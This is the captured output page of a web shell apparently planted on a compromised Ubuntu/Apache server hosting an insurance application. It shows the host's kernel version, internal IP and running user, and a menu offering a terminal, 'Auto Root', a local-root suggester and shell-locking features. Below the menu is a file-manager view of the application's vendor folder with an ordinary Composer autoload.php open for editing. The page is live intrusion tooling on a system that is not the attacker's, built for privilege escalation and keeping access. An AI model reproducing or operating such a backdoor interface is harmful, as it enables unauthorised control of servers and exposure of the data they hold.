Linux rspmc 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
Server IP : 192.168.20.114 & Your IP : 216.73.216.34
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
/
var /
www /
html /
e-asuransi /
vendor /
Delete
Unzip
Name
Size
Permission
Date
Action
composer
[ DIR ]
drwxrwxr-x
2025-01-23 10:52
mpdf
[ DIR ]
drwxrwxr-x
2025-01-23 10:52
myclabs
[ DIR ]
drwxrwxr-x
2025-01-23 10:52
nullpunkt
[ DIR ]
drwxrwxr-x
2025-01-23 10:52
paragonie
[ DIR ]
drwxrwxr-x
2025-01-23 10:52
psr
[ DIR ]
drwxrwxr-x
2025-01-23 10:52
setasign
[ DIR ]
drwxrwxr-x
2025-01-23 10:52
squizlabs
[ DIR ]
drwxrwxr-x
2025-01-23 10:52
autoload.php
771
B
-rw-rw-r--
2023-03-01 17:07
Save
Rename
<?php // autoload.php @generated by Composer if (PHP_VERSION_ID < 50600) { if (!headers_sent()) { header('HTTP/1.1 500 Internal Server Error'); } $err = 'Composer 2.3.0 dropped support for autoloading on PHP <5.6 and you are running '.PHP_VERSION.', please upgrade PHP or use Composer 2.2 LTS via "composer self-update --2.2". Aborting.'.PHP_EOL; if (!ini_get('display_errors')) { if (PHP_SAPI === 'cli' || PHP_SAPI === 'phpdbg') { fwrite(STDERR, $err); } elseif (!headers_sent()) { echo $err; } } trigger_error( $err, E_USER_ERROR ); } require_once __DIR__ . '/composer/autoload_real.php'; return ComposerAutoloaderInite928459aa254a2231dd02c8cf9e931c9::getLoader();